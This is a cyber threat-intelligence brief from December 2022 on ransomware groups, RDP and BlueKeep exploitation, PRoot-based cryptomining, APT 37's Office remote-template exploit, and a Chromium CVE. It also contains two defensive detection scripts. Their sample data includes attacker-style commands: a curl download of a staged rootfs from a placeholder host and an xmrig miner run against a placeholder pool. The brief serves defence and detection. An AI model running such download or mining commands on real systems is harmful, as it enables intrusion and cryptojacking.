Cyber Intel Brief: Dec 1 – 7, 2022


CISA Publishes Advisory for Cuba Ransomware Affiliates

Impacted Industries: Financial and Insurance, Public Administration, Healthcare and Social Assistance, Manufacturing, and Information

What You Need To Know:

The FBI and CISA released a joint Cybersecurity Advisory (CSA) to disseminate known Cuba ransomware TTPs and observables identified through FBI investigations, third-party reporting, and open-source reporting. The advisory updates the FBI’s December 2021 Flash: Indicators of Compromise Associated with Cuba Ransomware.

Analyst Note: Since the December 2021 FBI Flash release, the number of U.S. entities compromised by Cuba ransomware, with ransoms demanded and paid, has doubled. As of August 2022, the FBI has identified that Cuba ransomware actors have compromised over 100 entities worldwide. The FBI has observed Cuba ransomware actors continuing to target U.S. entities in the following five sectors: financial and insurance, public administration, healthcare and social services, manufacturing, and information. The threat actors will likely continue to exploit known vulnerabilities, send phishing emails that drop RomCom malware, and use compromised credentials and RDP tools to gain initial access.


Profile of Vice Society Ransomware Threat Actor

Impacted Industries: All; Primarily has focused on Educational Services

What You Need To Know:

Palo Alto’s Unit 42 published a profile of the Vice Society ransomware group, which has been active since 2021 and has targeted victims in various industries, particularly education, healthcare, and public administration. The group uses a variety of ransomware strains and has been known to exploit vulnerabilities such as PrintNightmare to escalate privileges and spread laterally across targeted networks. They have also been observed timing their attacks to coincide with the beginning and end of the school year in the U.S. Victims are typically small- to medium-sized businesses with no clear geographical focus. Protecting against Vice Society requires a robust behavioral monitoring platform and adequately trained staff to handle ongoing ransomware threats.

Analyst Note: According to their leak site, Vice Society has compromised 91 organizations, with 33 victims in the educational services sector. Most of their victims are in the United States, operating in educational services, healthcare and social assistance, state and local government, and manufacturing. They recently added a blog to their leak site where they refute claims that they sometimes avoid using ransomware and instead focus on simple extortion. They also stated they had been working for too long. Their statement suggests either that they are taking a temporary break from targeting the US educational sector and will resume, or that they have stopped targeting that sector altogether and will focus on other industries and countries.

Threat Landscape

Rise in Exploitation Attempts Against RDP

Impacted Industries: All; Cyble observed threat actors selling RDP access for public administration, finance and insurance, manufacturing, and information sectors

What You Need To Know:

Cyble’s global sensor network data identified almost 5 million RDP exploitation attempts between September and November, primarily targeting the United States and Russia. The vulnerability threat actors most often attempted to exploit was BlueKeep (CVE-2019-0708). Cyble hypothesizes that most RDP ports exposed to the internet remain vulnerable to BlueKeep, having identified over 50,000 internet-exposed instances still affected by it.

Analyst Note: Internet-exposed RDP has played a critical role in previous cyber incidents, as seen in the last two Cyber Intel Briefs. Cyble’s dark web data has captured 154 forum posts by various threat actors selling access to over 10,000 RDPs across multiple sectors, including public administration, finance and insurance, manufacturing, and information. The Adversary Tactics and Intelligence (ATI) team assesses that threat actors’ use of RDP access will increase in the next two weeks, either to gain initial access or to move laterally in the targeted environment.


Threat Actors Use Open-source Tool to “Bring Their Own Filesystem” to Deploy Cryptominers

Impacted Industries: Educational Services

What You Need To Know:

Sysdig, a cloud security company, recently discovered a threat actor (TA) leveraging an open-source tool called PRoot to “bring their own filesystem,” allowing the TA to execute tools and malware from that filesystem. During the attacks, the TA downloaded masscan, Nmap, and the XMRig cryptominer in a gzip-compressed tar file and hosted the archive on a popular storage platform. Once the TA gained access to the target system, they downloaded the filesystem and PRoot, saved them to the tmp/Proot folder, unpacked the filesystem, and ran the PRoot executable. The threat actors then executed a bash shell from this new filesystem, so the shell runs from the TA’s filesystem instead of the original host filesystem.

Analyst Note: PRoot allows an adversary to run the same tools and malware across different Linux distributions, and it also lets threat actors run malware built for other architectures, such as ARM. Building the filesystem outside the targeted network lets the threat actor download and configure all tools and malware in advance, avoiding detection by the security solutions deployed in the targeted environment. We expect threat actors to employ this technique in cryptomining attacks for the foreseeable future. However, as the method becomes more widely known, threat actors could also use it to infect systems with ransomware and to download other malware post-exploitation.
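The following is an added detection example; it is not Sysdig’s or Deepwatch’s code. It runs over a constructed set of process-execution events (the key=value field names ts, uid, exe, cwd and cmd are an assumption made for illustration) and flags the behaviour described above: a proot binary being run, the guest rootfs passed to it, and any later process whose executable lives inside that guest rootfs. Staging paths such as /tmp/Proot and the pool and storage hostnames are constructed placeholders; the -r/-R/-S options are PRoot’s real rootfs options.

```python
import re
import shlex
from dataclasses import dataclass
from posixpath import basename

# Writable directories an intruder typically stages into; the brief notes tmp/Proot.
STAGING_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
# Tools the brief says were bundled into the attacker-supplied filesystem.
BUNDLED_TOOLS = {"masscan", "nmap", "xmrig"}

# key=value pairs; a value in double quotes may contain spaces (used for cmd).
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Constructed sample events (field names are an assumption, hostnames are placeholders).
SAMPLE_EVENTS = """\
ts=1670000001 uid=1001 exe=/usr/bin/curl cwd=/tmp/Proot cmd="curl -sO https://storage.example.test/rootfs.tar.gz"
ts=1670000002 uid=1001 exe=/usr/bin/tar cwd=/tmp/Proot cmd="tar -xzf rootfs.tar.gz"
ts=1670000003 uid=1001 exe=/tmp/Proot/proot cwd=/tmp/Proot cmd="/tmp/Proot/proot -S /tmp/Proot/rootfs /bin/bash"
ts=1670000004 uid=1001 exe=/tmp/Proot/rootfs/bin/bash cwd=/ cmd="/bin/bash"
ts=1670000005 uid=1001 exe=/tmp/Proot/rootfs/usr/bin/xmrig cwd=/ cmd="xmrig -o pool.example.test:3333"
ts=1670000006 uid=0 exe=/usr/bin/apt cwd=/root cmd="apt update"
ts=1670000007 uid=1002 exe=/usr/bin/nmap cwd=/home/ops cmd="nmap -sn 10.0.0.0/24"
"""


@dataclass
class Finding:
    ts: str
    severity: str
    reason: str
    exe: str


def parse_event(line: str) -> dict:
    """Parse one key=value event line into a dict."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in FIELD_RE.finditer(line)}


def guest_root_from_cmd(cmd: str):
    """Return the guest rootfs handed to proot via -r, -R or -S, or None."""
    argv = shlex.split(cmd)
    for i, arg in enumerate(argv[:-1]):
        if arg in ("-r", "-R", "-S"):
            return argv[i + 1].rstrip("/")
    return None


def in_staging(path: str) -> bool:
    return any(path.startswith(d) for d in STAGING_DIRS)


def analyze(events_text: str) -> list:
    """Return findings in event order; later events are correlated with earlier proot runs."""
    findings = []
    guest_roots = []  # rootfs paths seen in earlier proot invocations
    for line in events_text.splitlines():
        ev = parse_event(line)
        if "exe" not in ev:
            continue
        exe, cmd, cwd = ev["exe"], ev.get("cmd", ""), ev.get("cwd", "")
        name = basename(exe)
        if name == "proot":
            findings.append(Finding(ev["ts"], "high", "PRoot executed", exe))
            root = guest_root_from_cmd(cmd)
            if root:
                guest_roots.append(root)
            continue
        guest = next((r for r in guest_roots if exe.startswith(r + "/")), None)
        if guest:
            findings.append(Finding(ev["ts"], "high", f"process runs from PRoot guest rootfs {guest}", exe))
        elif name in BUNDLED_TOOLS and in_staging(exe):
            findings.append(Finding(ev["ts"], "high", f"{name} executed from staging directory", exe))
        elif in_staging(exe):
            findings.append(Finding(ev["ts"], "medium", "binary executed from staging directory", exe))
        elif name == "tar" and in_staging(cwd):
            findings.append(Finding(ev["ts"], "low", "archive unpacked inside staging directory", exe))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.ts} [{f.severity}] {f.reason}: {f.exe}")
```

The benign Nmap run from /usr/bin by an operations account produces no finding, while the bash shell and XMRig launched from the guest rootfs are flagged because they are correlated with the earlier proot invocation rather than matched on name alone. The same correlation works on real auditd or EDR process telemetry once the field names are adjusted.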

Exploited Vulnerabilities

APT 37 Uses Office Docs to Exploit CVE-2022-41128

Impacted Industries: All; APT 37 primarily targets public & private organizations in support of DPRK’s strategic military, political, and economic interests

What You Need To Know:

A threat actor attributed by Google to APT 37, a North Korean state-backed threat group, exploited CVE-2022-41128, an Internet Explorer (IE) vulnerability, via a malicious Microsoft Office document. Google discovered the document when several VirusTotal users based in South Korea uploaded it. The document downloads a rich text file (RTF) remote template that fetches remote HTML content rendered by the IE engine, which does not require the user to use IE or have it set as their default browser. However, Google could not recover the final payload for this campaign. They have previously observed APT 37 deliver a variety of implants such as ROKRAT, BLUELIGHT, and DOLPHIN.

Analyst Note: Threat actors can exploit this vulnerability through malicious documents (the technique used in this incident) or by luring users to visit a malicious website. Threat actors that use the phishing technique to exploit the vulnerability would require the user to disable Protected View, which initiates the infection. Google’s report shows that “Mark-of-the-Web” is not foolproof, and relying on it alone poses a significant risk to organizations. We assess that other North Korean threat groups will likely adopt this technique in their campaigns for financial gain and intelligence collection, and that threat actors not sponsored by North Korea will incorporate exploitation of this vulnerability into their campaigns.
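Because the delivery chain above starts with an Office document that pulls a remote template, a useful triage check is to look for remote template references before a document ever reaches Protected View. The scanner below is an added example, not Google’s or Deepwatch’s code. It inspects the two common carriers: an OOXML (.docx/.dotx) package whose word/_rels/settings.xml.rels carries an attachedTemplate relationship pointing at an http, https, ftp or UNC target, and an RTF file whose \template destination points at such a URL. The sample documents and the template.example.test hostname are constructed in memory so the script runs offline.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# OOXML relationship type that attaches a template to a Word document.
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
# Targets that make Word fetch the template over the network (http/https/ftp/UNC).
# Local file:// templates such as Normal.dotm are deliberately not flagged.
REMOTE_RE = re.compile(r"^(?:https?://|ftp://|\\\\)", re.IGNORECASE)
# RTF \template destination: {\*\template <path-or-url>}
RTF_TEMPLATE_RE = re.compile(r"\{\\\*\\template\s+([^}]+)\}", re.IGNORECASE)


def scan_ooxml(data: bytes) -> list:
    """Return remote attachedTemplate targets found in any .rels part of the package."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                target = rel.get("Target", "")
                if rel.get("Type") == ATTACHED_TEMPLATE and REMOTE_RE.match(target):
                    hits.append(target)
    return hits


def scan_rtf(data: bytes) -> list:
    """Return remote targets of the RTF \\template destination."""
    text = data.decode("latin-1")
    return [m.group(1).strip() for m in RTF_TEMPLATE_RE.finditer(text)
            if REMOTE_RE.match(m.group(1).strip())]


def scan(data: bytes) -> list:
    """Dispatch on file magic: zip (OOXML) or RTF; other formats are not scanned."""
    if data.startswith(b"PK\x03\x04"):
        return scan_ooxml(data)
    if data.lstrip().startswith(b"{\\rtf"):
        return scan_rtf(data)
    return []


# ---- constructed sample documents (not real malware) ----
def build_docx(settings_rels: str) -> bytes:
    """Build a minimal OOXML package containing the given settings.xml.rels part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


def rels(target: str) -> str:
    return ('<?xml version="1.0" encoding="UTF-8"?>'
            '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" Target="{target}" TargetMode="External"/>'
            '</Relationships>')


REMOTE_URL = "http://template.example.test/template.rtf"  # constructed placeholder
SUSPICIOUS_DOCX = build_docx(rels(REMOTE_URL))
BENIGN_DOCX = build_docx(rels("file:///C:/Users/user/Templates/Normal.dotm"))
SUSPICIOUS_RTF = ("{\\rtf1\\ansi{\\*\\template " + REMOTE_URL + "}Quarterly report}").encode()
BENIGN_RTF = b"{\\rtf1\\ansi Quarterly report}"

if __name__ == "__main__":
    for label, doc in [("suspicious docx", SUSPICIOUS_DOCX), ("benign docx", BENIGN_DOCX),
                       ("suspicious rtf", SUSPICIOUS_RTF), ("benign rtf", BENIGN_RTF)]:
        print(f"{label}: {scan(doc) or 'no remote template'}")
```

A hit from scan() is not proof of malice (organizations do attach templates from internal servers), but any remote template reference in a document that arrived by e-mail is worth holding for analysis regardless of whether the file carries Mark-of-the-Web.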

CISA Adds CVE-2022-4262 to its Known Exploited Vulnerabilities Catalog

Impacted Industries: All

What You Need To Know:

Based on evidence of active exploitation, CISA has added CVE-2022-4262 to its Known Exploited Vulnerabilities Catalog. This vulnerability in Google’s Chromium V8 engine could allow a threat actor to exploit heap corruption via a crafted HTML page. CISA does not have additional data on impact.

Analyst Note: Threat actors will likely ramp up exploitation of the newly listed vulnerability within the next two weeks. However, we cannot rule out the possibility that threat actors could switch to other tactics and techniques to gain initial access. We base this assessment on CISA documenting the vulnerability in its Known Exploited Vulnerabilities Catalog and on the likelihood that organizations will prioritize remediation of it.

What We Mean When We Say

Estimates of Likelihood

We use probabilistic language to reflect the Intel Team’s estimates of the likelihood of developments or events because analytical judgments are not certain. Terms like “probably,” “likely,” “very likely,” and “almost certainly” denote a higher than even chance. The terms “unlikely” and “remote” imply that an event has a lower than even chance of occurring; they do not imply that it will not occur. Terms like “might” reflect situations where we are unable to assess the likelihood, usually because the relevant information is lacking, sketchy, or fragmented. Terms like “we can’t dismiss,” “we can’t rule out,” and “we can’t discount” refer to an unlikely, improbable, or distant event with significant consequences.

Confidence in Assessments

Our assessments and projections are based on data that varies in scope, quality, and source. As a result, we assign our assessments high, moderate, or low levels of confidence, as follows:

  • High confidence indicates that our decisions are based on reliable information and/or that the nature of the problem allows us to make a sound decision. However, a “high confidence” judgment is not a fact or a guarantee, and it still carries the risk of being incorrect.
  • Moderate confidence denotes that the information is credible and plausible, but not of high enough quality or sufficiently corroborated to warrant a higher level of assurance.
  • Low confidence indicates that the information’s credibility and/or plausibility are in doubt, that the information is too fragmented or poorly corroborated to make solid analytic inferences, or that we have serious concerns or problems with the sources.
